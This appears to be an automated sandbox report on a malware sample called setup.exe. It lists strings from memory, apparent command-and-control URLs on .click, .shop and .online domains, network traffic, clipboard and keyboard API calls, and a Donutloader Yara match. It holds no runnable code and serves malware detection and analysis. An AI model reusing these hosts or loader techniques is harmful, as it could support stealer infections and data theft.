              Source: setup.exe, 00000000.00000003.1900019826.000000000123E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001277000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: setup.exe, 00000000.00000003.1942277987.000000000123E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft6a
              Source: setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: setup.exeString found in binary or memory: http://crl.starfieldtech.com/repository/0
              Source: setup.exeString found in binary or memory: http://crl.starfieldtech.com/repository/sfsroot.crl0P
              Source: setup.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: setup.exeString found in binary or memory: http://multicommander.com/updates/version.xml
              Source: setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: setup.exeString found in binary or memory: http://ocsp.starfieldtech.com/0D
              Source: setup.exeString found in binary or memory: http://ocsp.thawte.com0
              Source: setup.exeString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
              Source: setup.exeString found in binary or memory: http://s2.symcb.com0
              Source: setup.exeString found in binary or memory: http://sf.symcb.com/sf.crl0f
              Source: setup.exeString found in binary or memory: http://sf.symcb.com/sf.crt0
              Source: setup.exeString found in binary or memory: http://sf.symcd.com0&
              Source: setup.exeString found in binary or memory: http://sv.symcb.com/sv.crl0W
              Source: setup.exeString found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: setup.exeString found in binary or memory: http://sv.symcd.com0&
              Source: setup.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: setup.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: setup.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: setup.exeString found in binary or memory: http://www.symauth.com/cps0(
              Source: setup.exeString found in binary or memory: http://www.symauth.com/rpa00
              Source: setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: setup.exe, 00000000.00000003.1927100047.0000000003C07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: setup.exe, 00000000.00000003.2180345766.0000000001289000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141767199.0000000001289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/
              Source: setup.exe, 00000000.00000003.2180345766.0000000001289000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141767199.0000000001289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/2
              Source: setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2180345766.0000000001289000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141767199.0000000001289000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
              Source: setup.exe, 00000000.00000002.4142166098.00000000031DA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txtebKit/537.36
              Source: setup.exe, 00000000.00000002.4141767199.0000000001289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txtk
              Source: setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: setup.exeString found in binary or memory: https://d.symcb.com/cps0%
              Source: setup.exeString found in binary or memory: https://d.symcb.com/rpa0
              Source: setup.exe, 00000000.00000002.4141521913.00000000011F9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4142246007.0000000003BD8000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2592829563.000000000121F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141655257.0000000001220000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4142309121.0000000003BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
              Source: setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtf1
              Source: setup.exe, 00000000.00000003.1900019826.000000000123E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001277000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/
              Source: setup.exe, 00000000.00000003.2593186194.000000000129D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141805946.000000000129D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/Mi
              Source: setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2180534792.000000000129C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/Mi6a
              Source: setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/VISc
              Source: setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/Y
              Source: setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/api
              Source: setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/api$
              Source: setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/apiP
              Source: setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/apih
              Source: setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/bu
              Source: setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/bub
              Source: setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/jh
              Source: setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942079040.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942170340.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/jhP
              Source: setup.exe, 00000000.00000003.1942079040.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942170340.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/la
              Source: setup.exe, 00000000.00000003.1942079040.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942170340.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/laK
              Source: setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/ob
              Source: setup.exe, 00000000.00000003.1942079040.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942170340.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/pi
              Source: setup.exe, 00000000.00000003.2180564664.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2179995599.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942079040.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942170340.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962388004.000000000128B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962426840.000000000128E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962216637.0000000001284000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1962295720.0000000001287000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.4141786472.000000000128F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1942376689.000000000128E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/pi:
              Source: setup.exe, 00000000.00000003.1900019826.000000000123E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://regularlavhis.click/piGW
              Source: setup.exe, 00000000.00000003.1901190667.0000000003C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: setup.exe, 00000000.00000003.1928046480.0000000003CFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: setup.exe, 00000000.00000003.1928046480.0000000003CFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: setup.exe, 00000000.00000003.1914260349.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1901190667.0000000003C73000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1914433684.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1914108419.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1901273060.0000000003C27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: setup.exe, 00000000.00000003.1901273060.0000000003C02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: setup.exe, 00000000.00000003.1914260349.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1901190667.0000000003C73000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1914433684.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1914108419.0000000003C27000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1901273060.0000000003C27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: setup.exe, 00000000.00000003.1901273060.0000000003C02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: setup.exe, 00000000.00000003.1900722037.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900647160.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1900503136.0000000003C1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: setup.exe, 00000000.00000003.1928046480.0000000003CFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: setup.exe, 00000000.00000003.1928046480.0000000003CFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: setup.exe, 00000000.00000003.1928046480.0000000003CFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: setup.exe, 00000000.00000003.1928046480.0000000003CFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: setup.exe, 00000000.00000003.1928046480.0000000003CFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49751 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49757 version: TLS 1.2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C12032 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_strncpy,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00C12032
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C12032 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_strncpy,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00C12032
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C11FA0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00C11FA0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C12626 GetFocus,GetKeyState,GetKeyState,GetKeyState,InvalidateRect,0_2_00C12626
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C31419 GetKeyState,GetKeyState,GetKeyState,SendMessageW,0_2_00C31419

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 00000000.00000002.4141412203.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\setup.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_01073735 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_01073735
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C921000_2_00C92100
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C4C2A00_2_00C4C2A0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C862790_2_00C86279
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C2A27A0_2_00C2A27A
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C684C00_2_00C684C0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C2A5D40_2_00C2A5D4
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C7C7FF0_2_00C7C7FF
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C767410_2_00C76741
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C7E8300_2_00C7E830
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C76A830_2_00C76A83
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C1CA990_2_00C1CA99
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C5ECD00_2_00C5ECD0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C76DE20_2_00C76DE2
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C56EA00_2_00C56EA0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C28F540_2_00C28F54
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C82F030_2_00C82F03
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C2945F0_2_00C2945F
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C2B5870_2_00C2B587
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C0D5710_2_00C0D571
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C815280_2_00C81528
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C298E80_2_00C298E8
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C6F9F00_2_00C6F9F0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C8D9700_2_00C8D970
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C31AAF0_2_00C31AAF
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C35A5B0_2_00C35A5B
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C91B400_2_00C91B40
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C27B540_2_00C27B54
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C91C400_2_00C91C40
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C91DC00_2_00C91DC0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C91D400_2_00C91D40
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C47D7F0_2_00C47D7F
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C91EC00_2_00C91EC0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C91E800_2_00C91E80
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C91EA00_2_00C91EA0
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00C91F500_2_00C91F50
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010203750_2_01020375
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010737350_2_01073735
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010381CA0_2_010381CA
              Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_010200000_2_01020000
